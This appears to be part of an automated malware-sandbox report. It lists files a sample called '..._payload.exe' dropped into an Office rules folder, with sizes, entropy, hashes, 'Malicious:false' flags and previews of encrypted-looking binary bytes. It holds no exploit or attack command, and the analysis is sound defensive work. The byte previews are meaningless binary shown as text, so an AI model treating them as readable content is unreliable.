                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.#..........&..?..l0..p.._P..T!@.....qQ...Tw....g0. .;QC...M".v......"3s.E..H;..].d(...t.Zh.h.....~.h..N.....3.H.Z.s...A.]..e..a+!H..#...y'T...R....2..x.i.@i~i.5.|.V{.'.f.v..}X..*....].Xu^....|.1..DlA.@..0.\...%7(.`9&C.P..q\..Zb....n....u.PX.'%B.....N:.0g.[pz.....7....h.7.M.jN.*=x..e8.9.9....A?5.{c...q...9...:.f>.gF.*.]^.]......:Tw.H.....MjLt...........s.-..|..y.M..|..f.......k......8.V...avP..c..q.....;.g'....OWd....l...X&S;.......|.S....w.Y.WF.II]..gY&.&D..+....y...5.. ......B3Y..h-..... ,.....B.'.q..n.CN.v..OHb.V.v.gI%ow....}e....'.9....M+$.4.<d.....j@p_J]...(..e...3,.9...{...p.9...........3Y<..;,ks...c:.,..X.8I..;kcx../.....Uf...|.rq..V....i;...xn7c.A.]....C..y.+....s..}.LF.v...2...._E.4AO..J.s..$n.uv.Jz....T...@..c`...#;H.c./#..X....p8I.E.@M%....w..YPP...%.<^a.M...~`.'G.\..*../.~.L......=.w.m........Y...Y2f..?.u..R..+...k....V.=G.L..>M+...t..GQ.......-....6%..Gb[:...'.A.*S.-@.{...=.p.C....y1.Y......1.bV=G............H....O..I.=al.m

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10625v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3024
                                                                                                                                                                      Entropy (8bit):7.941848416419075
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:dhnB0kCxxnzrTbQeQ9GVYbBACT+6jrPCazhwNwLY6YUy+lq6106Y5CVRdlD:dhB0NjzvZQ4VYbBT9jb5hiwwN+l106wa
                                                                                                                                                                      MD5:F871D31B2B05D019064FF544800056A4
                                                                                                                                                                      SHA1:0A8FA53A8D89FC156EFC697A65F7888AF054D59A
                                                                                                                                                                      SHA-256:6C997FDD6A14475A1232AB1F811B7E7E0B563F7432225EF4CE3D3BD197BAC532
                                                                                                                                                                      SHA-512:B6F51B0884A2667CD960CB5BC7EFCA367A909B6AA1CA0E5745778280B8ED8B86A13B51F3393FFB91EBDDB0CDC0E055EB53F64D9CC587D983A4DC9A8896EAEE8B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlL..".....kb....}...c~...a~...<..H....rn.J.....#v)W.....U.V.D.........ZvC.g..T........,...[....2..u:p]`i.X:.Hy......s........Y..cS.....*.S.R|..u_..2........n.............*a^..~......&12G.@J..7.....y.V..A.%Zg..9.:..(7. L...Xc...S....... .T..Wk.A.X8....Y.`..b=.........QA9.S0.u..!].F..~.:.L.mpg.. ..}A.jC..N.[.S.7....z..C..o..o.d..L...H......f....G`&......D.WIs......"[.R .=\.....;...3.....9...>....x ....QQ... .H&.O..j|.|%...!..Dg#q.......|.~10.?n.t...^.E...XL.......e...%:.........,...6....Qsc..vG..p...Y....9..!...I].0,... ..o"......-{.\.z..5.f..d&.O..........{/N....eiW.....!..01...G.1.XL.i..2\}.M`...<d7XN6^...IIw.....M.....=...tn.F..V..K..0....4.D4..E...}?v..Q.7.+..V.T:h......N..W.*R.J....B\;.s....=...T..RL...y.RAzn..>..M.....-L....[..?}.1|y.Q...80.[.>.m.c."@%CcD.<[.l.,..'.8....w......GDR.O.;9.=C}.B.)~..t...aW.4.L.......... .i..D,.6.T.".[j.../(\......\.TQZ5.o?k./..t....[9.}P.h..f......Gm...VL..\....+#..E?..;.4.+.j.M...`{|..wH.[7.....).

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10626v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1675
                                                                                                                                                                      Entropy (8bit):7.8844777471964465
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:vjh2TQmvzvm91KHK5AZnkTVbQyxiLrCNc4xmm818agTJTD:v90za1KHKuCTij3iTxGaac/
                                                                                                                                                                      MD5:5697A468A769E12E857EE2EF1D5E8862
                                                                                                                                                                      SHA1:0FB5A84EE8CF60C36624828DEF6098AEFABB9D08
                                                                                                                                                                      SHA-256:032C617C4D8667386ED384685AAD5E45F8A0D644FF3FC7568FBA6A28C7CA0D5B
                                                                                                                                                                      SHA-512:A23DEE75258F5C3B1065EDCD85E588E5D19EF9EE5B1CA6C33A7BF68DC3AE76BBEB2936E74907899B324F3E5EBC3A88B4C03690D5FECF8937B2A223345FBF499C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....'&..s[tY.e=`D...q..o|..N..3\...].....zLF?{..vu.{..C=M.....e[...'.C.*...#.OC..V.f..#....R..c.]]...`..U.=2..\.w.C...}.U....QgK.f$..L[....+..=......:&eYL.0eM.....'L).b.G...p....Q.Bxy..m.p......._D.jc..u...\1.5h.w....o..g..Y.sF6..b.."2...gl8 .-5;......(../..m"..T......A.,....:.+..*....Rs.-..^9.-.L&u..I#....zPE..../WH#.}1.i-..Kl.E.... H.;.......K......b.{5.o....w.%2..g...P..|:Z..\.m.8;..|...F@........q.....-......\.T.=.P.U1L....8.4Dv..!..rs..@>.\*R....P....."...........+~po3.g$..[Oc'9...w..>.r.u.3|i..2.S.s..b.?#...$w.l...ZP.J1..\a...s.9..rS!......."l..G.}.L......('Gl...FBT).B....BvD... k..~....B@.X....$.8....K..r.q.\.^.v..{.....0.3.....W[A.Yh..8...a...94. .t..|...Q....s....8-....h....On.,../J".h.I.m...d......&c@.K....I.J@^{S..;....Ro...Q]S..ROd..6..:....h..F.ZZ%...|m.q.......C.......K6.V)&.....O...HZ..-0.p......w..:...1.d.........jg...%]..m.!.t.h.AVt.L.44.-....P.......w..V.|/..\x.\f.0qTF.6..z5./....M........z...3/..I..>.^I.."Z..*T.%

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10627v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2113
                                                                                                                                                                      Entropy (8bit):7.894382821488564
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ciXvESpmfmTGP9OA1zxUtJHmqWxLF9EMY9CbKkCZdkGwWPhDByD:/pxCJxOGtpeGfCfv5hDBa
                                                                                                                                                                      MD5:3B174CF708D3D72BB60CABAB2B3B0B9F
                                                                                                                                                                      SHA1:38E2273925095F9E12C3153FAC7DAA6B7BC7DBD3
                                                                                                                                                                      SHA-256:0B66D4653A058779DC3053492382E1802B936FBAAC374C3A3065FBA4EA87EEDA
                                                                                                                                                                      SHA-512:C76095CF19D47562CACA752B522970AE2A84503EAAFABE8AA716129632920865A418E276187EFECABFEF9FF4BCB60AF5E96F574312D75B4339A524F46ACFF59C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.awN.J.dF..S..7.x.M...k......}...-.zl.0Om.$......Bt.YS^.%...H.r,".M...S....-mK..)[...v..^...B7....H..t771...wK c...S.V......J.........1....B...8.......7....!.G.N.{...1...V.\AA...a&.....6..\C>..L..:....!g......H*..i.*.t.....0v.:....<g.Th.~.".#....f.a...dc.1..B...|..X.pt...$...r.AK..q..V.,.....!..............+...O.7>.I....7b.j[.z..y..Z^|...w..7.?.Kl(...dL 8ss...B..e..w...k.D...y..\....c..r.......H.....-&..6..}4E.r...S.R@B:.."|..p.p.......}/..)...FN.. ....pq..s.D..R..L..h..pe...]..4..a...V.t.;>p.....+...e..h...hW.8d.....X...N...-........L.|E)`.2.j..wp...k..-....sE,......2..o...JF...0.s.K.......(.X8...BF.....P.%......W.D+V..;/Df.}..i.d...Dr...%..p......<.;)..)>......5.6B/...^.#....H..*..g.jSJc..A.g.o[K.....6n}$I..m..s.#.Qx...KT.2./&.R..%m......F2c..|.......1..m.....?..".\.P.....,.\.....OJ.$..~..p7....8L.......Y.A..0.?Co.(.l...m..HGA.q.7..Eln:;g$.....B..5o8.s.lX4p.e..U..rz..f....na.l...8..F.c9G...4.+.m.4..4....e*vm.d\g.Yv.........

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10781v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):813
                                                                                                                                                                      Entropy (8bit):7.691184739849079
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:k9fn9DHTc2vS3o/RPBEcBOjQNhIlj8YTLjt2bD:kJ9DzJvLlpQV/6D
                                                                                                                                                                      MD5:E8DFB4A61DFEFA96D96644E11C1A9953
                                                                                                                                                                      SHA1:6DC07419591797DCA19E2087DD9E92F1D04B83DF
                                                                                                                                                                      SHA-256:0FD80FDDD178B681F8574D8EC64EFC37DF495AF71B60F5A7B3554C48B1A4BEBA
                                                                                                                                                                      SHA-512:42E6EBCEF634A606CD15F9988E0E7FAEF33B3599B4D88B4A07E17B4BC61ABBA8F81C661E2FD7B21BC16B83A8079C945177422A99A92B3BF6C8D119C8B9689768
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmllV.(A.>.8..[Y&..R..[..s.%B...pt(..mq.V.0.....&...{%...B............b....5NZ..."<*.u./.FqX.......o...l.q.>`...*..;.."'k.b.......Y.'H[..?.2..n,.W.../.1......Kg.Gg.D"..<...1..wR.2/X.d...I..5....,....B}d..'_..").t"*U@f...9.I..h@....<2,Y..'Z..*.RZ.E.xOd.X..E..K.F.3....f...Tj.;..V..k.r.\.?..c.:."B@(m..;..H.<)F.3..V.C..yV...=.W.6h.@..7c......{..8A./}...r......S..i....Y.0...s...G!..en........n.s61.D.X,U..}..Az8.Z..z...Zr.|.z&..Q.+ N...O.u..W.Z?.'z.*..qW...;....Zf.......}h.@.......+r\.f.~.m....A._..`.t...O...g0..}?.....A..A....:K*.....~..N..o....3..kgX..^.. .bK.{.....A..e,y.dh..).n.*......*..x..............j.a.1.*S..[.>.1.7.......[*[..l.!.@.f.6.y.V...O.e..d..0..\.......[...=....W.....'jmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10784v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2070
                                                                                                                                                                      Entropy (8bit):7.903274769886117
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Y69od8XB+9ox5gCr4o1nGe8/HJpHVAicce2KEwfsNvEHDuD:72d8oox5h4onGJPxAicnsjvEHi
                                                                                                                                                                      MD5:65B0B55C25D5FFBAD5EA297DF4FDFF7F
                                                                                                                                                                      SHA1:BEE0AA9D8D9412FB38979D4BE0C1409A8F31E139
                                                                                                                                                                      SHA-256:82C7393B71B1D916233FC42805441443B4B1B0C56D8B4412326424502000E3B4
                                                                                                                                                                      SHA-512:068C6A9E0976AFA2F0BC5BCE7ED242CC84BE7C74BB28C7B139B2FED77884797A5A919E98A63403A61E1E851D2A510FE562B7C76664FBA67BAC79902776D578F0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.'.~....6.1...U.....o.20.S?e.?......A..7.sUy>..........{C..=.km.QU./b./.....E....x.a..q..KA!...e*.B..:)....~.....M.mx.`E....sj.....f}j.DA*..2d.{..3..Sc..ij...X..wN...i4......?<.#..U%....~n..f..sc.......1..`i;5P...|.....K^.......*.._...O..~^/.W.8.pP2....&.O.i:.d.&FBH...V&$%..{s.|r{..K)......K.-u.vv..!.'.X..c/&..q...2r....B..........j...~x>Lo.Zy...CU.....3I....O.gh...vo..0%...Di.>:.A.+..."......Ua+...\1....LN.(. &.uK..<{..fXm.w......l......`p.!...y..mu.x%.'X.....j..q.Mx#.../.#x./.b...0.x.u....{..g..I.6C./......56y/...1...:r....E.....'......5r.o...Di..)>.Vw/. '*..J...L...M...N\?Ah.^..BW...E.a3.Er.0......B.:.}........s......u.s..~."...h.S..E..d).....1..&.p.Q....H.E....N..}.5gxI,......J.I{.v3.R.N.8g..k.B2A.C<J....P`.......+..:..&.VM....%......g...?.m..92J..c..k.".].t.........if...`{o........3.*).1....@[.T.u.h..iM.....z...X.AB..f."DH.O4/v.*..b.xbM...`...p..>\...U(....s!.p.u....J5+l#.Zh....F.l.Bv}..<.......V....?D..RT...dz5k...l#..F.o.zj.$....a.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10800v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):789
                                                                                                                                                                      Entropy (8bit):7.704074029151576
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:ZP0QlwMyTgjOVIAp4dVaujQSuZVxTfVzy3nzj2z3kD337iSK8+d5ZhomXTWMSUdV:ZflwXKlAp4LHQSGYXzUUZj+Df6T2bD
                                                                                                                                                                      MD5:9E2AB975F389D858361C5E91FCA86962
                                                                                                                                                                      SHA1:D17DF45DCFA8B9C0D88E484DF5C85CC7951A7253
                                                                                                                                                                      SHA-256:0C09ABCD0116115B66C5C39339D2A848F6B2C46D5FD09EA094D3D8C17B51EA80
                                                                                                                                                                      SHA-512:3C31A47E9552F6E935C8288D0E7AED43E4223897C4D7D21B9272291D981C1F01FB86CFBF1AA0784DF569AD1BD68DA547CA59B5568BFF53AC787E96FD7BF76A84
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..c.X.....GW=.<....L}..zY..0...e..........J..a3.r..y..g-q.,v.b. ...f.&...5....@.Xo]..\<.E...D.....9..J...buZb.:.u..,..r.<.&...$.P..+.h..w......6..1..%....R...<.Pu.*.......sA`O.5.....1...+K..MWW./.p.G.P........R.W....eG!4.v...+_.Fi..oL.E.I?.:x}5U^$sR...............(..A.!..... ...[+....us.?K.+...l.......`.{.....)o.M...46..9....<0.l.........wk.....+.kY.H;..GnA...X.r.~.K..1W[7:......o.Z#....\.7......agbg.q......B T:..'.k.o.<.}UG.............) W....x4f.dhye.....`.]....).sGz.]...k1...r.P.'..p. .k|.09M....T....RU.r..D.....Y..........X......EzbVK..`.C.)0@..-[0.v.....y.._.O1.}9.W.....!8E..7.....N.h].6.....[..$^A...2.:..`....u.[HE.f...Fv..W....<.a...9s..&.=i......8..%K.Q...$..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10801v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3017
                                                                                                                                                                      Entropy (8bit):7.9404307569796915
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:2lCbkGB9dfpy/NGreU9gXCgwX5x00PYEk7wheKXZNQKtDt+KHZBAva4Oi6D:mHGBFfiUWCgwX5lPzk7PY+K/AvvS
                                                                                                                                                                      MD5:F1C68F2AE11D463270D75AE29D769DD7
                                                                                                                                                                      SHA1:0685045C1491F2A5AE3F20A76D9CF7265C0150BC
                                                                                                                                                                      SHA-256:5EC43F930BC91FB0378E38ACB0DEC30413C64997B5232898956C32C21DE2DFF2
                                                                                                                                                                      SHA-512:D8B00398E2855DCBC65F2C6794ED8963C61953067A23341D5FCC66AD121AED8B6E65A56194B5918B0F804E26102CB2A45E1DCCCB5BFE3A9B2E44CFEBF3059A62
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...... .UZ...U..2;.bi.E.}.d......_.F......h.%-..n..WsJ....Y.w2|a...~....[..si.4.....8....,.....M5>@......+.........6......4...........i.Kp .@.....ZTY4t8.....hH}....3.xVP.[....T_.%rm..Ekc.BK..xE'."U`..6.P>.!..1lm...6.V6..V...H_.M.....QJ.YW....A.............pz....-q..k.s.-.......8...W.g2.[...?.9.....i.Ii.(/.n..h.FB$d.x}.....>.<x...?..@Z_...|.#`..l.).\..!."..R0.Y.k.....u-...ysN.R.L..P.=M.....Gk)......qzQ8J$.z..Z......nU(.J.w8i7....T."..ep...G..i....I..KP.1.....)...K{.O_...L.7......6.?....8...........";?.xh...^.."......6.%.B.....?..;Cp.7P.z.......O......l../.t.......(.d..............Q&...h..N...x.X..6.....%.k...R..a...x...W..>.(...#8.rb.....e..5.g..dw.J_..u?C.:^r..k..fRQ.Y..N.-?...3..Y....mi@..8.<~..>E.....9k=~..R.u{......T..O...W_.B..Q..{..M..g..."......m.MU...-....].....Z......#...m....O+c.......X...K..?.L....f.VY..[.`g.S...dl..r=m.M..@.x..l..deA..Y..T..r...*`..T.Z...I....@.NQw......s....".LQ..}:fN*;1ZR..G.2Q..z.....].gK...6.Zh

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10802v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3017
                                                                                                                                                                      Entropy (8bit):7.941997357737337
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:lzpp7Vm2/y8XEWCXVY1lQ8Dtok3Ykc1sq4kdppMhYmpqHdWazb/Tsk3D:G2/FsgDtokjzLkdvMbpqpzco
                                                                                                                                                                      MD5:D7C0C3C925F7498BED232FD14BEB8782
                                                                                                                                                                      SHA1:82E56725ACD5757702B20197F988EF1C90D079E2
                                                                                                                                                                      SHA-256:89E03DB43CFFC3AB4E84900C8C9613A7228A06104C93ED32809C6E9C29CD4113
                                                                                                                                                                      SHA-512:4CB38082B4EC0D4450F95E1B87F713E2B9E53A4F4891D741D973799ABBF608209DD0F8D6383B8C7190DC3980A07037EF21EC61E43C9E1EA074939B0258D44850
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.t..(.nI.'WZ..j.d.zO....a..Qc.}.)*.:j..{..H>.77u.........G.rbiB..R?.,\.....|..Q......[../4~n.T\2f.3I)l..m....W.9.}...J.Td-.c|7..R=..n.!..}.'wH.RB..j.D..".n..y=.K.......A.u.@..._..Ogn#)...D..aS..00..>8b=.ol.a...+....u.O......iy...^*.....^..K.idQ[.6.%..,.h@.k..V.{..d.5...&x.....H.,..i...O..[......Q..J0]..?.$q_-.r..b.|U..5..U..s.0...n....KC.t.67......_..[...=#.D.xU66..Hf.9..F.7...~...S.n4z.JN...9.....4o.....S4(............?Y.....i......W..mt3...P.N.wU.}....S...v.3.;..fV-.L..&\FuQ....:../......p.[t...Y..VSk*F<.._l.<Gj.....^.~.PN.I..v.....~...;G...R.'.qE.7P....R...?.*dm.I."R_.L...f...j R.d..6..5]..T.2.w8..j..k....]HH...*.j......Mo.l........./_.I..>.W<..(..g....y.L0%...R..t........r..T...@M.....S=.c.\..x..ZqV.~m.p...JJ....?wG.. [x.0XlOz.8.n@........i...c:......t1.Tx.........W.v/.6.j.*9......b.@ ..o...]..G.......Fw`...E_.}.7.......<..Q=W...b".q?..mGZ....T.....D.#R.....a$......w...R. l.s..#.l....\VK....=gtfV"..*Z..........JM4...q7Dq..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10803v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4639
                                                                                                                                                                      Entropy (8bit):7.96468292375274
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:E2GVE7J2Kkzb7yPfBGgP/9FrG3GlO/5PjshR1pTucRuP2H:PG2KzbePfBGgtcWYArUP2H
                                                                                                                                                                      MD5:ED8E362253D248E1C7F9ADD03A0BF0C9
                                                                                                                                                                      SHA1:1698614991600802C9292903BA5F053320D9B478
                                                                                                                                                                      SHA-256:6616F6C6925E692E3906880FD13653640962BF4C02B8B3643CA15DF6192B7943
                                                                                                                                                                      SHA-512:A5643FC81EDD2E15E0A78327693FC8E48363236C0C5FEFAB66B1E420FB89925FCAB22A33347009F945A89D3805580AB0C37387B23A2FC4BBD6FDA2CCE9661E18
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.1..."...E{Izt\.V..../.5.T.....=..z.0.BH;..h..I..+1)....i..|1...t.1U.].......5I.....I......o...A>.rbI.F.F.&w.o.N. ..uf..X...N'$.M.&..T.....Sy../u.l..bq.R....L....T.RW:YVCj4..h..j..P..+...\...00..9.H.&.1ls.6.(.......fR_..d.n.s..}..d...m.w.o.>.....M...v/..e...6F..d.....1..}"......(........d.5...r.'.E......R.?...p7..~3._j."Sx).).......^..r.`....2.NK.Mb.@._.9.y.7......L.........T3.!......Wm+T...n.T...&.h...m..~t...2$.....f..-.....<|..........L[..&.'.p...T.z.)...8....._.s..1.|"..H..!...V..f.....,..j.O..8_...b.c.d.x...8.L.c........f4..@W.}....c:...)y(.Uf@..S..f.Nk1.=6}...Z.E..Q...W.._I../M/I..$.....&._@...az..t ..]5.*......5....b.....w&..i.:...A.i.g........,.y....ak.....e.s.6..........!...h|.../..w..@....{<,.....;..s|.{w&P....#C.v...V.)...bG.c.ZbV.........e}.DL+l.kUyg@.{.A...9"...Y.8~..Y...%Lx.G..,.j1<...~s....e.......O.....;UdC.{..v...io....6.CM.a...u..'.{.wk.C...:V2...J..l.c...j.4/......M..6z.|......>.1Y..*..PR.. .....Y....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10807v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1329
                                                                                                                                                                      Entropy (8bit):7.8505598110499255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:F/pzlbgtuGjyKtpdQQvfug0og4jzzk9jJJSGBZk+iaQuXnOn02bD:FxlWjyKtpdQMfug0l4PzktyGB3OunMHD
                                                                                                                                                                      MD5:22ACEF9EBD1560786D5784D9DD67A33A
                                                                                                                                                                      SHA1:BA9333AB2F5B592DA3E75CA844AA4A025E3E88F3
                                                                                                                                                                      SHA-256:899480AF4B43BAFE9A7CC47CEB3028F1873D7BD33DB542CDB468CCAF06785FCE
                                                                                                                                                                      SHA-512:E9E45C0A00B479742C7F2F9495A4D99B1EED0267B861187B4E78D7AB32B6343FC636DB11A38256B465D455CEA85C989591D6762D6D1C03B5A4C78380E355474D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml........l...CR...r.6~...+..J........r..-4Xx..Y.).........@..X.)...Y.e.u^..T,........h..G7.G...2s.U.^..s.|3...M....z....`b...?.\...N.!O.....S..'.-.......G..4#.*.b%k..s*...X>q....9...n+.......=5Ej.P....&'d3d0.G.pw..I..I..[...(.Ie....n..z.OPh........u...=....$7hl.?!...x....L.....S3.j..H..).....S.+...F.g..........6.....S......rbv..x.q..D...1e^.$o...yu...n.{..Q>."..X.M.O.!.8.....`~..T...].+.91.`....o~.$..=....]...bO.e.)..C.O.C...%..y..P.a..s?.Jn.-..N..B...4b.)_.s.4Pw....|..f..e&.q.m.S.b....e0A...#nh....{..n7.......D..(.5 Ot...'..?....w.}....(.R,.^...\...%....lc.....&Z}.^..z...6...k.y........(e..(....;.?sk..GW.....E.?.'^J....h.........1.g.......y../..Lf.J...]g.P..`.z.m.!IUd..W.....&.K..y*..YFP._v.k.W...s...O?zA.}0]...=dt...uu....J.........c...U.K..uz}g.>2...i..Ae....X%S..{:J.N.%3J`.7s...w...0Y.aY..RV...2.E..L+..'....YK.....wVS...{8..5..U.R.*.F.V.....^.C .D.......-\K..H;.....w.&..G.i..B..q.x...3..Y....u>.,..K..USW7..~.!.#.lJ@.@.....2[.Q..[0T..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10808v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1395
                                                                                                                                                                      Entropy (8bit):7.851773514018436
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:/S4v1q9McsuWFVrcZky1GYzu688G128CmhDdVCT2hGl+D1LnSaPv8IbLlHpbzNkB:/bcnoNcNNNb+NPhGQ5SE5t2pD
                                                                                                                                                                      MD5:B83FA700A7034E7DD0EAECC8903FF2AF
                                                                                                                                                                      SHA1:EEB9D76F4FBFBD5B1C6443E491A0FA092AC56E5F
                                                                                                                                                                      SHA-256:D8AFD84BC95CE5EA7487085CCC06EC72556F3FD3C1071D7C4C52AC1120BBF509
                                                                                                                                                                      SHA-512:790789C9DA64AA54AC4986B664BF4024D1EAC89702470F9A08510276C8A9F86C81B9C3E80E37145D3529A01C8715D00A9BD0D6971A05D075BB3428DDB67C23AF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......@cJ.....M^..$.<...>._._.....d.fz.../.../.H.a...,.W^.3.j......oM.r.[......l.. ..A..Q.6'.N.-....E.y.1.f.pn..at./.Eu.+$).."..&.#$...>..ix....Mu...\...H....x=p.]....Q...p...Q]....s..+.[./..^.....#!..P..B.......&#......O....U18.~W7....6.u..........J..(H....l4..A.+..:p..q#.=v.1.Q,.....0:e...|.j*....a..y.....H.-.~.........G5.m..o.....*.I..\h......>..X.........C..) .l.y.M4..+0,.y.#.AC......E..u6.......e.b.u|.4@...p..x.Z....F.&..~R?ki..~m...}.z.6WH..?...$...Y.N..g^..@.B...#t..<(W..`.sTH-a..C^.Um.]u....NA.}._y..qk&.o...n@.A.[R....@...'..A.@...G../..N..5....7.t.....*j.O.W. ..'.."..(.Z1.....UC0M./....O.......-\.........+a\....9.|.m@.5GW..A.5...)u.{.|.../.NV......v.G@..&.qkG)6_..D?..D|.r...s......).VCT..k...[...<j.....|.6..S...Md. ..5U.......+O..C.....0UtN..B..em.r.6.t.&..ar.e*....OQ..A.2....S.*.-!...2"..&.C...A....J.L..._H2UTP........c..>...P.q.je.[...s&......K.y.0UJ.P..y...PGu..L..d2.63..5......<..y..2.p....HZyvV]..*...|..J

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10818v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1124
                                                                                                                                                                      Entropy (8bit):7.831580910988563
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6jtecSsbB4eprtChsmRtRm5rl1IwMBqPdV2bD:o7fb6KrtismQ5/IwMBJD
                                                                                                                                                                      MD5:83B23862E6F9A06771E6C818DD8CA860
                                                                                                                                                                      SHA1:1C5BAA79D7AF0872C607FDDB9E6B56767481A5A3
                                                                                                                                                                      SHA-256:DF1ACF44652258959BB104D8A806360CADA2EB4BAFC406C4CD85467B23F6E4F1
                                                                                                                                                                      SHA-512:EDB3986B7573FA6E1A2D4B361D8030E08B49A65256810941434444562C32FB57C945A975448CC5FB590BBE744611EF323C2A8991E8A6F9ED14ABE6D8FB3E89B0
                                                                                                                                                                      Malicious:false
